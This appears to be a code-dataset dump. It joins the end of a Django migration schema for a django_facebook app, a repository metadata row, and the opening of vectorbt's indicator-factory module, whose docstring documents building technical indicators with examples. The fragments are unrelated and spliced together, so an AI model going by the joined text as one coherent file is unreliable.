'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'django_facebook.attended': {
'Meta': {'object_name': 'Attended'},
'concentrations': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['django_facebook.Concentration']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'profile': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['django_facebook.FacebookProfile']"}),
'school': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['django_facebook.School']"}),
'type': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'year': ('django.db.models.fields.CharField', [], {'max_length': '8'})
},
'django_facebook.concentration': {
'Meta': {'object_name': 'Concentration'},
'cid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '31'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'django_facebook.facebookprofile': {
'Meta': {'object_name': 'FacebookProfile'},
'bio': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'birthday': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '31'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
'hometown': ('django.db.models.fields.CharField', [], {'max_length': '31', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '31'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'locale': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'middle_name': ('django.db.models.fields.CharField', [], {'max_length': '31', 'null': 'True', 'blank': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'schools': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['django_facebook.School']", 'through': "orm['django_facebook.Attended']", 'symmetrical': 'False'}),
'timezone': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'uid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '31'}),
'user': ('django.db.models.fields.related.OneToOneField', [], {'related_name': "'fb_profile'", 'unique': 'True', 'to': "orm['auth.User']"}),
'username': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'})
},
'django_facebook.school': {
'Meta': {'object_name': 'School'},
'city': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'founded': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'phone': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'picture': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'sid': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '31'}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '16', 'null': 'True', 'blank': 'True'}),
'website': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'})
}
}
complete_apps = ['django_facebook']
| [
"ash211@gmail.com"
] | ash211@gmail.com |
53d2dffde18c9980be149e87a501fe5b3b978137 | e45efaf397712245b337d053a0fe2b388674e74d | /vectorbt/indicators/factory.py | 86266b73a949c1c2384a25d4b5828ceb362f5c90 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | hiddenvs/vectorbt | 35efc95bf7c5cc6b84917c11c988c3e07ff3ed44 | 44968ac579a1420f713df326eb730bae93041622 | refs/heads/master | 2023-03-30T15:34:53.424776 | 2021-03-25T21:50:33 | 2021-03-25T21:50:33 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 129,901 | py | """A factory for building new indicators with ease.
The indicator factory class `IndicatorFactory` offers a convenient way to create technical
indicators of any complexity. By providing it with information such as calculation functions and
the names of your inputs, parameters, and outputs, it will create a stand-alone indicator class
capable of running the indicator for an arbitrary combination of your inputs and parameters. It also
creates methods for signal generation and supports common pandas and parameter indexing operations.
Each indicator is basically a pipeline that:
* Accepts a list of input arrays (for example, OHLCV data)
* Accepts a list of parameter arrays (for example, window size)
* Accepts other relevant arguments and keyword arguments
* For each parameter combination, performs calculation on the input arrays
* Concatenates results into new output arrays (for example, rolling average)
This pipeline can be well standardized, which is done by `run_pipeline`.
`IndicatorFactory` simplifies the usage of `run_pipeline` by generating and pre-configuring
a new Python class with various class methods for running the indicator.
Each generated class includes the following features:
* Accepts input arrays of any compatible shape thanks to broadcasting
* Accepts output arrays written in-place instead of returning
* Accepts arbitrary parameter grids
* Supports caching and other optimizations out of the box
* Supports pandas and parameter indexing
* Offers helper methods for all inputs, outputs, and properties
Consider the following price DataFrame composed of two columns, one per asset:
```python-repl
>>> import vectorbt as vbt
>>> import numpy as np
>>> import pandas as pd
>>> from numba import njit
>>> from datetime import datetime
>>> price = pd.DataFrame({
... 'a': [1, 2, 3, 4, 5],
... 'b': [5, 4, 3, 2, 1]
... }, index=pd.Index([
... datetime(2020, 1, 1),
... datetime(2020, 1, 2),
... datetime(2020, 1, 3),
... datetime(2020, 1, 4),
... datetime(2020, 1, 5),
... ])).astype(float)
>>> price
a b
2020-01-01 1.0 5.0
2020-01-02 2.0 4.0
2020-01-03 3.0 3.0
2020-01-04 4.0 2.0
2020-01-05 5.0 1.0
```
For each column in the DataFrame, let's calculate a simple moving average and get its
crossover with price. In particular, we want to test two different window sizes: 2 and 3.
## Naive approach
A naive way of doing this:
```python-repl
>>> ma_df = pd.DataFrame.vbt.concat(
... price.rolling(window=2).mean(),
... price.rolling(window=3).mean(),
... keys=pd.Index([2, 3], name='ma_window'))
>>> ma_df
ma_window 2 3
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 1.5 4.5 NaN NaN
2020-01-03 2.5 3.5 2.0 4.0
2020-01-04 3.5 2.5 3.0 3.0
2020-01-05 4.5 1.5 4.0 2.0
>>> above_signals = (price.vbt.tile(2).vbt > ma_df)
>>> above_signals = above_signals.vbt.signals.first(after_false=True)
>>> above_signals
ma_window 2 3
a b a b
2020-01-01 False False False False
2020-01-02 True False False False
2020-01-03 False False True False
2020-01-04 False False False False
2020-01-05 False False False False
>>> below_signals = (price.vbt.tile(2).vbt < ma_df)
>>> below_signals = below_signals.vbt.signals.first(after_false=True)
>>> below_signals
ma_window 2 3
a b a b
2020-01-01 False False False False
2020-01-02 False True False False
2020-01-03 False False False True
2020-01-04 False False False False
2020-01-05 False False False False
```
Now the same using `IndicatorFactory`:
```python-repl
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window'],
... output_names=['ma'],
... ).from_apply_func(vbt.nb.rolling_mean_nb)
>>> myind = MyInd.run(price, [2, 3])
>>> above_signals = myind.price_above(myind.ma, crossover=True)
>>> below_signals = myind.price_below(myind.ma, crossover=True)
```
The `IndicatorFactory` class is used to construct indicator classes from UDFs. First, we provide
all the necessary information (indicator conig) to build the facade of the indicator, such as the names
of inputs, parameters, and outputs, and the actual calculation function. The factory then generates a
self-contained indicator class capable of running arbitrary configurations of inputs and parameters.
To run any configuration, we can either use the `run` method (as we did above) or the `run_combs` method.
## run and run_combs methods
The main method to run an indicator is `run`, which accepts arguments based on the config
provided to the `IndicatorFactory` (see the example above). These arguments include input arrays,
in-place output arrays, parameters, and arguments for `run_pipeline`.
The `run_combs` method takes the same inputs as the method above, but computes all combinations
of passed parameters based on a combinatorial function and returns multiple instances that
can be compared with each other. For example, this is useful to generate crossover signals
of multiple moving averages:
```python-repl
>>> myind1, myind2 = MyInd.run_combs(price, [2, 3, 4])
>>> myind1.ma
myind_1_window 2 3
a b a b a b
2020-01-01 NaN NaN NaN NaN NaN NaN
2020-01-02 1.5 4.5 1.5 4.5 NaN NaN
2020-01-03 2.5 3.5 2.5 3.5 2.0 4.0
2020-01-04 3.5 2.5 3.5 2.5 3.0 3.0
2020-01-05 4.5 1.5 4.5 1.5 4.0 2.0
>>> myind2.ma
myind_2_window 3 4
a b a b a b
2020-01-01 NaN NaN NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN NaN NaN
2020-01-03 2.0 4.0 NaN NaN NaN NaN
2020-01-04 3.0 3.0 2.5 3.5 2.5 3.5
2020-01-05 4.0 2.0 3.5 2.5 3.5 2.5
>>> myind1.ma_above(myind2.ma, crossover=True)
myind_1_window 2 3
myind_2_window 3 4 4
a b a b a b
2020-01-01 False False False False False False
2020-01-02 False False False False False False
2020-01-03 True False False False False False
2020-01-04 False False True False True False
2020-01-05 False False False False False False
```
Its main advantage is that it doesn't need to re-compute each combination thanks to smart caching.
To get details on what arguments are accepted by any of the class methods, use `help`:
```python-repl
>>> help(MyInd.run)
Help on method run:
run(price, window, short_name='custom', hide_params=None, hide_default=True, **kwargs) method of builtins.type instance
Run `Indicator` indicator.
* Inputs: `price`
* Parameters: `window`
* Outputs: `ma`
Pass a list of parameter names as `hide_params` to hide their column levels.
Set `hide_default` to False to show the column levels of the parameters with a default value.
Other keyword arguments are passed to `vectorbt.indicators.factory.run_pipeline`.
```
## Parameters
`IndicatorFactory` allows definition of arbitrary parameter grids.
Parameters are variables that can hold one or more values. A single value can be passed as a
scalar, an array, or any other object. Multiple values are passed as a list or an array
(if the flag `is_array_like` is set to False for that parameter). If there are multiple parameters
and each is having multiple values, their values will broadcast to a single shape:
```plaintext
p1 p2 result
0 0 1 [(0, 1)]
1 [0, 1] [2] [(0, 2), (1, 2)]
2 [0, 1] [2, 3] [(0, 2), (1, 3)]
```
To illustrate the usage of parameters in indicators, let's build a basic indicator that returns 1
if the rolling mean is within upper and lower bounds, and -1 if it's outside:
```python-repl
>>> @njit
... def apply_func_nb(price, window, lower, upper):
... output = np.full(price.shape, np.nan, dtype=np.float_)
... for col in range(price.shape[1]):
... for i in range(window, price.shape[0]):
... mean = np.mean(price[i - window:i, col])
... output[i, col] = lower < mean < upper
... return output
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(apply_func_nb)
```
By default, when `per_column` is set to False, each parameter is applied to the entire input.
One parameter combination:
```python-repl
>>> MyInd.run(
... price,
... window=2,
... lower=3,
... upper=5
... ).output
custom_window 2
custom_lower 3
custom_upper 5
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 0.0 1.0
2020-01-04 0.0 1.0
2020-01-05 1.0 0.0
```
Multiple parameter combinations:
```python-repl
>>> MyInd.run(
... price,
... window=[2, 3],
... lower=3,
... upper=5
... ).output
custom_window 2 3
custom_lower 3 3
custom_upper 5 5
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN
2020-01-03 0.0 1.0 NaN NaN
2020-01-04 0.0 1.0 0.0 1.0
2020-01-05 1.0 0.0 0.0 0.0
```
Product of parameter combinations:
```python-repl
>>> MyInd.run(
... price,
... window=[2, 3],
... lower=[3, 4],
... upper=5,
... param_product=True
... ).output
custom_window 2 3
custom_lower 3 4 3 4
custom_upper 5 5 5 5
a b a b a b a b
2020-01-01 NaN NaN NaN NaN NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN NaN NaN NaN NaN
2020-01-03 0.0 1.0 0.0 1.0 NaN NaN NaN NaN
2020-01-04 0.0 1.0 0.0 0.0 0.0 1.0 0.0 0.0
2020-01-05 1.0 0.0 0.0 0.0 0.0 0.0 0.0 0.0
```
Multiple parameter combinations, one per column:
```python-repl
>>> MyInd.run(
... price,
... window=[2, 3],
... lower=[3, 4],
... upper=5,
... per_column=True
... ).output
custom_window 2 3
custom_lower 3 4
custom_upper 5 5
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 0.0 NaN
2020-01-04 0.0 0.0
2020-01-05 1.0 0.0
```
Parameter defaults can be passed directly to the `IndicatorFactory.from_custom_func` and
`IndicatorFactory.from_apply_func`, and overriden in the run method:
```python-repl
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(apply_func_nb, window=2, lower=3, upper=4)
>>> MyInd.run(price, upper=5).output
custom_window 2
custom_lower 3
custom_upper 5
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 0.0 1.0
2020-01-04 0.0 1.0
2020-01-05 1.0 0.0
```
Some parameters are meant to be defined per row, column, or element of the input.
By default, if we pass the parameter value as an array, the indicator will treat this array
as a list of multiple values - one per input. To make the indicator view this array as a single
value, set the flag `is_array_like` to True in `param_settings`. Also, to automatically broadcast
the passed scalar/array to the input shape, set `bc_to_input` to True, 0 (index axis), or 1 (column axis).
In our example, the parameter `window` can broadcast per column, and both parameters
`lower` and `upper` can broadcast per element:
```python-repl
>>> @njit
... def apply_func_nb(price, window, lower, upper):
... output = np.full(price.shape, np.nan, dtype=np.float_)
... for col in range(price.shape[1]):
... for i in range(window[col], price.shape[0]):
... mean = np.mean(price[i - window[col]:i, col])
... output[i, col] = lower[i, col] < mean < upper[i, col]
... return output
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(
... apply_func_nb,
... param_settings=dict(
... window=dict(is_array_like=True, bc_to_input=1, per_column=True),
... lower=dict(is_array_like=True, bc_to_input=True),
... upper=dict(is_array_like=True, bc_to_input=True)
... )
... )
>>> MyInd.run(
... price,
... window=[np.array([2, 3]), np.array([3, 4])],
... lower=np.array([1, 2]),
... upper=np.array([3, 4]),
... ).output
custom_window 2 3 4
custom_lower array_0 array_0 array_1 array_1
custom_upper array_0 array_0 array_1 array_1
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN
2020-01-03 1.0 NaN NaN NaN
2020-01-04 1.0 0.0 1.0 NaN
2020-01-05 0.0 1.0 0.0 1.0
```
Broadcasting a huge number of parameters to the input shape can consume lots of memory,
especially when the array materializes. Luckily, vectorbt implements flexible broadcasting,
which preserves the original dimensions of the parameter. This requires two changes:
setting `keep_raw` to True in `broadcast_kwargs` and passing `flex_2d` to the apply function.
There are two configs in `vectorbt.indicators.configs` exactly for this purpose: one for column-wise
broadcasting and one for element-wise broadcasting:
```python-repl
>>> from vectorbt.base.reshape_fns import flex_select_auto_nb
>>> from vectorbt.indicators.configs import flex_col_param_config, flex_elem_param_config
>>> @njit
... def apply_func_nb(price, window, lower, upper, flex_2d):
... output = np.full(price.shape, np.nan, dtype=np.float_)
... for col in range(price.shape[1]):
... _window = flex_select_auto_nb(0, col, window, flex_2d)
... for i in range(_window, price.shape[0]):
... _lower = flex_select_auto_nb(i, col, lower, flex_2d)
... _upper = flex_select_auto_nb(i, col, upper, flex_2d)
... mean = np.mean(price[i - _window:i, col])
... output[i, col] = _lower < mean < _upper
... return output
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['window', 'lower', 'upper'],
... output_names=['output']
... ).from_apply_func(
... apply_func_nb,
... param_settings=dict(
... window=flex_col_param_config,
... lower=flex_elem_param_config,
... upper=flex_elem_param_config
... ),
... pass_flex_2d=True
... )
```
Both bound parameters can now be passed as a scalar (value per whole input), a 1-dimensional
array (value per row or column, depending upon whether input is a Series or a DataFrame),
a 2-dimensional array (value per element), or a list of any of those. This allows for the
highest parameter flexibility at the lowest memory cost.
For example, let's build a grid of two parameter combinations, each being one window size per column
and both bounds per element:
```python-repl
>>> MyInd.run(
... price,
... window=[np.array([2, 3]), np.array([3, 4])],
... lower=price.values - 3,
... upper=price.values + 3,
... ).output
custom_window 2 3 4
custom_lower array_0 array_0 array_1 array_1
custom_upper array_0 array_0 array_1 array_1
a b a b
2020-01-01 NaN NaN NaN NaN
2020-01-02 NaN NaN NaN NaN
2020-01-03 1.0 NaN NaN NaN
2020-01-04 1.0 1.0 1.0 NaN
2020-01-05 1.0 1.0 1.0 1.0
```
Indicators can also be parameterless. See `vectorbt.indicators.basic.OBV`.
## Inputs
`IndicatorFactory` supports passing none, one, or multiple inputs. If multiple inputs are passed,
it tries to broadcast them into a single shape.
Remember that in vectorbt each column means a separate backtest instance. That's why in order to use
multiple pieces of information, such as open, high, low, close, and volume, we need to provide
them as separate pandas objects rather than a single DataFrame.
Let's create a parameterless indicator that measures the position of the close price within each bar:
```python-repl
>>> @njit
... def apply_func_nb(high, low, close):
... return (close - low) / (high - low)
>>> MyInd = vbt.IndicatorFactory(
... input_names=['high', 'low', 'close'],
... output_names=['output']
... ).from_apply_func(apply_func_nb)
>>> MyInd.run(price + 1, price - 1, price).output
a b
2020-01-01 0.5 0.5
2020-01-02 0.5 0.5
2020-01-03 0.5 0.5
2020-01-04 0.5 0.5
2020-01-05 0.5 0.5
```
To demonstrate broadcasting, let's pass high as a DataFrame, low as a Series, and close as a scalar:
```python-repl
>>> df = pd.DataFrame(np.random.uniform(1, 2, size=(5, 2)))
>>> sr = pd.Series(np.random.uniform(0, 1, size=5))
>>> MyInd.run(df, sr, 1).output
0 1
0 0.960680 0.666820
1 0.400646 0.528456
2 0.093467 0.134777
3 0.037210 0.102411
4 0.529012 0.652602
```
By default, if a Series was passed, it's automatically expanded into a 2-dimensional array.
To keep it as 1-dimensional, set `to_2d` to False.
Similar to parameters, we can also define defaults for inputs. In addition to using scalars
and arrays as default values, we can reference other inputs:
```python-repl
>>> @njit
... def apply_func_nb(ts1, ts2, ts3):
... return ts1 + ts2 + ts3
>>> MyInd = vbt.IndicatorFactory(
... input_names=['ts1', 'ts2', 'ts3'],
... output_names=['output']
... ).from_apply_func(apply_func_nb, ts2='ts1', ts3='ts1')
>>> MyInd.run(price).output
a b
2020-01-01 3.0 15.0
2020-01-02 6.0 12.0
2020-01-03 9.0 9.0
2020-01-04 12.0 6.0
2020-01-05 15.0 3.0
>>> MyInd.run(price, ts2=price * 2).output
a b
2020-01-01 4.0 20.0
2020-01-02 8.0 16.0
2020-01-03 12.0 12.0
2020-01-04 16.0 8.0
2020-01-05 20.0 4.0
```
What if an indicator doesn't take any input arrays? In that case, we can force the user to
at least provide the input shape. Let's define a generator that emulates random returns and
generates synthetic price:
```python-repl
>>> @njit
... def apply_func_nb(input_shape, start, mu, sigma):
... rand_returns = np.random.normal(mu, sigma, input_shape)
... return start * vbt.nb.cumprod_nb(rand_returns + 1)
>>> MyInd = vbt.IndicatorFactory(
... param_names=['start', 'mu', 'sigma'],
... output_names=['output']
... ).from_apply_func(
... apply_func_nb,
... require_input_shape=True,
... seed=42
... )
>>> MyInd.run(price.shape, 100, 0, 0.01).output
custom_start 100
custom_mu 0
custom_sigma 0.01 0.01
0 100.496714 99.861736
1 101.147620 101.382660
2 100.910779 101.145285
3 102.504375 101.921510
4 102.023143 102.474495
```
We can also supply pandas meta such as `input_index` and `input_columns` to the run method:
```python-repl
>>> MyInd.run(
... price.shape, 100, 0, 0.01,
... input_index=price.index, input_columns=price.columns
... ).output
custom_start 100
custom_mu 0
custom_sigma 0.01 0.01
a b
2020-01-01 100.496714 99.861736
2020-01-02 101.147620 101.382660
2020-01-03 100.910779 101.145285
2020-01-04 102.504375 101.921510
2020-01-05 102.023143 102.474495
```
One can even build input-less indicator that decides on the output shape dynamically:
```python-repl
>>> from vectorbt.base.combine_fns import apply_and_concat_one
>>> def apply_func(i, ps, input_shape):
... out = np.full(input_shape, 0)
... out[:ps[i]] = 1
... return out
>>> def custom_func(ps):
... input_shape = (np.max(ps),)
... return apply_and_concat_one(len(ps), apply_func, ps, input_shape)
>>> MyInd = vbt.IndicatorFactory(
... param_names=['p'],
... output_names=['output']
... ).from_custom_func(custom_func)
>>> MyInd.run([1, 2, 3, 4, 5]).output
custom_p 1 2 3 4 5
0 1 1 1 1 1
1 0 1 1 1 1
2 0 0 1 1 1
3 0 0 0 1 1
4 0 0 0 0 1
```
## Outputs
There are two types of outputs: regular and in-place outputs:
* Regular outputs are one or more arrays returned by the function. Each should have an exact
same shape and match the number of columns in the input multiplied by the number of parameter values.
* In-place outputs are not returned but modified in-place. They broadcast together with inputs
and are passed to the calculation function as a list, one per parameter.
Two regular outputs:
```python-repl
>>> @njit
... def apply_func_nb(price):
... return price - 1, price + 1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... output_names=['out1', 'out2']
... ).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> pd.testing.assert_frame_equal(myind.out1, myind.price - 1)
>>> pd.testing.assert_frame_equal(myind.out2, myind.price + 1)
```
One regular output and one in-place output:
```python-repl
>>> @njit
... def apply_func_nb(price, in_out2):
... in_out2[:] = price + 1
... return price - 1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... output_names=['out1'],
... in_output_names=['in_out2']
... ).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> pd.testing.assert_frame_equal(myind.out1, myind.price - 1)
>>> pd.testing.assert_frame_equal(myind.in_out2, myind.price + 1)
```
Two in-place outputs:
```python-repl
>>> @njit
... def apply_func_nb(price, in_out1, in_out2):
... in_out1[:] = price - 1
... in_out2[:] = price + 1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... in_output_names=['in_out1', 'in_out2']
... ).from_apply_func(apply_func_nb)
>>> myind = MyInd.run(price)
>>> pd.testing.assert_frame_equal(myind.in_out1, myind.price - 1)
>>> pd.testing.assert_frame_equal(myind.in_out2, myind.price + 1)
```
By default, in-place outputs are created as empty arrays with uninitialized values.
This allows creation of optional outputs that, if not written, do not occupy much memory.
Since not all outputs are meant to be of data type `float`, we can pass `dtype` in the `in_output_settings`.
```python-repl
>>> @njit
... def apply_func_nb(price, in_out):
... in_out[:] = price > np.mean(price)
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... in_output_names=['in_out']
... ).from_apply_func(
... apply_func_nb,
... in_output_settings=dict(in_out=dict(dtype=bool))
... )
>>> MyInd.run(price).in_out
a b
2020-01-01 False True
2020-01-02 False True
2020-01-03 False False
2020-01-04 True False
2020-01-05 True False
```
Another advantage of in-place outputs is that we can provide their initial state:
```python-repl
>>> @njit
... def apply_func_nb(price, in_out1, in_out2):
... in_out1[:] = in_out1 + price
... in_out2[:] = in_out2 + price
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... in_output_names=['in_out1', 'in_out2']
... ).from_apply_func(
... apply_func_nb,
... in_out1=100,
... in_out2='price'
... )
>>> myind = MyInd.run(price)
>>> myind.in_out1
a b
2020-01-01 101 105
2020-01-02 102 104
2020-01-03 103 103
2020-01-04 104 102
2020-01-05 105 101
>>> myind.in_out2
a b
2020-01-01 2.0 10.0
2020-01-02 4.0 8.0
2020-01-03 6.0 6.0
2020-01-04 8.0 4.0
2020-01-05 10.0 2.0
```
## Without Numba
It's also possible to supply a function that is not Numba-compiled. This is handy when working with
third-party libraries (see the implementation of `IndicatorFactory.from_talib`). Additionally,
we can set `keep_pd` to True to pass all inputs as pandas objects instead of raw NumPy arrays.
!!! note
Already broadcasted pandas meta will be provided; that is, each input array will have the
same index and columns.
Let's demonstrate this by wrapping a basic composed [pandas_ta](https://github.com/twopirllc/pandas-ta) strategy:
```python-repl
>>> import pandas_ta as ta
>>> def apply_func(open, high, low, close, volume, ema_len, linreg_len):
... df = pd.DataFrame(dict(open=open, high=high, low=low, close=close, volume=volume))
... df.ta.strategy(ta.Strategy("MyStrategy", [
... dict(kind='ema', length=ema_len),
... dict(kind='linreg', close='EMA_' + str(ema_len), length=linreg_len)
... ]))
... return tuple([df.iloc[:, i] for i in range(5, len(df.columns))])
>>> MyInd = vbt.IndicatorFactory(
... input_names=['open', 'high', 'low', 'close', 'volume'],
... param_names=['ema_len', 'linreg_len'],
... output_names=['ema', 'ema_linreg']
... ).from_apply_func(
... apply_func,
... keep_pd=True,
... to_2d=False
... )
>>> my_ind = MyInd.run(
... ohlcv['Open'],
... ohlcv['High'],
... ohlcv['Low'],
... ohlcv['Close'],
... ohlcv['Volume'],
... ema_len=5,
... linreg_len=[8, 9, 10]
... )
>>> my_ind.ema_linreg
custom_ema_len 5
custom_linreg_len 8 9 10
date
2021-02-02 NaN NaN NaN
2021-02-03 NaN NaN NaN
2021-02-04 NaN NaN NaN
2021-02-05 NaN NaN NaN
2021-02-06 NaN NaN NaN
... ... ... ...
2021-02-25 52309.302811 52602.005326 52899.576568
2021-02-26 50797.264793 51224.188381 51590.825690
2021-02-28 49217.904905 49589.546052 50066.206828
2021-03-01 48316.305403 48553.540713 48911.701664
2021-03-02 47984.395969 47956.885953 48150.929668
```
In the example above, only one Series per open, high, low, close, and volume can be passed.
To enable the indicator to process two-dimensional data, set `to_2d` to True and create a loop
over each column in the `apply_func`.
!!! hint
Writing a native Numba-compiled code may provide a performance that is magnitudes higher
than that offered by libraries that work on pandas.
## Raw outputs and caching
`IndicatorFactory` re-uses calculation artifacts whenever possible. Since it was originally designed
for hyperparameter optimization and there are times when parameter values gets repeated,
prevention of processing the same parameter over and over again is inevitable for good performance.
For instance, when the `run_combs` method is being used and `speedup` is set to True, it first calculates
the raw outputs of all unique parameter combinations and then uses them to build outputs for
the whole parameter grid.
Let's first take a look at a typical raw output by setting `return_raw` to True:
```python-repl
>>> raw = vbt.MA.run(price, 2, [False, True], return_raw=True)
>>> raw
([array([[ nan, nan, nan, nan],
[1.5 , 4.5 , 1.66666667, 4.33333333],
[2.5 , 3.5 , 2.55555556, 3.44444444],
[3.5 , 2.5 , 3.51851852, 2.48148148],
[4.5 , 1.5 , 4.50617284, 1.49382716]])],
[(2, False), (2, True)],
2,
[])
```
It consists of a list of the returned output arrays, a list of the zipped parameter combinations,
the number of input columns, and other objects returned along with output arrays but not listed
in `output_names`. The next time we decide to run the indicator on a subset of the parameters above,
we can simply pass this tuple as the `use_raw` argument. This won't call the calculation function and
will throw an error if some of the requested parameter combinations cannot be found in `raw`.
```python-repl
>>> vbt.MA.run(price, 2, True, use_raw=raw).ma
ma_window 2
ma_ewm True
a b
2020-01-01 NaN NaN
2020-01-02 1.666667 4.333333
2020-01-03 2.555556 3.444444
2020-01-04 3.518519 2.481481
2020-01-05 4.506173 1.493827
```
Here is how the performance compares when repeatedly running the same parameter combination
with and without speedup:
```python-repl
>>> a = np.random.uniform(size=(1000,))
>>> %timeit vbt.MA.run(a, np.full(1000, 2), speedup=False)
73.4 ms ± 4.76 ms per loop (mean ± std. dev. of 7 runs, 1 loop each)
>>> %timeit vbt.MA.run(a, np.full(1000, 2), speedup=True)
8.99 ms ± 114 µs per loop (mean ± std. dev. of 7 runs, 100 loops each)
```
!!! note
`speedup` is disabled by default.
Enable `speedup` if input arrays have few columns and there are tons of repeated parameter combinations.
Disable `speedup` if input arrays are very wide, if two identical parameter combinations can lead to
different results, or when requesting raw output, cache, or additional outputs outside of `output_names`.
Another performance enhancement can be introduced by caching, which has to be implemented by the user.
The class method `IndicatorFactory.from_apply_func` has an argument `cache_func`, which is called
prior to the main calculation.
Consider the following scenario: we want to compute the relative distance between two expensive
rolling windows. We have already decided on the value for the first window, and want to test
thousands of values for the second window. Without caching, and even with `speedup` enabled,
the first rolling window will be re-calculated over and over again and waste our resources:
```python-repl
>>> @njit
... def roll_mean_expensive_nb(price, w):
... for i in range(100):
... out = vbt.nb.rolling_mean_nb(price, w)
... return out
>>> @njit
... def apply_func_nb(price, w1, w2):
... roll_mean1 = roll_mean_expensive_nb(price, w1)
... roll_mean2 = roll_mean_expensive_nb(price, w2)
... return (roll_mean2 - roll_mean1) / roll_mean1
>>> MyInd = vbt.IndicatorFactory(
... input_names=['price'],
... param_names=['w1', 'w2'],
... output_names=['output'],
... ).from_apply_func(apply_func_nb)
>>> MyInd.run(price, 2, 3).output
custom_w1 2
custom_w2 3
a b
2020-01-01 NaN NaN
2020-01-02 NaN NaN
2020-01-03 -0.200000 0.142857
2020-01-04 -0.142857 0.200000
2020-01-05 -0.111111 0.333333
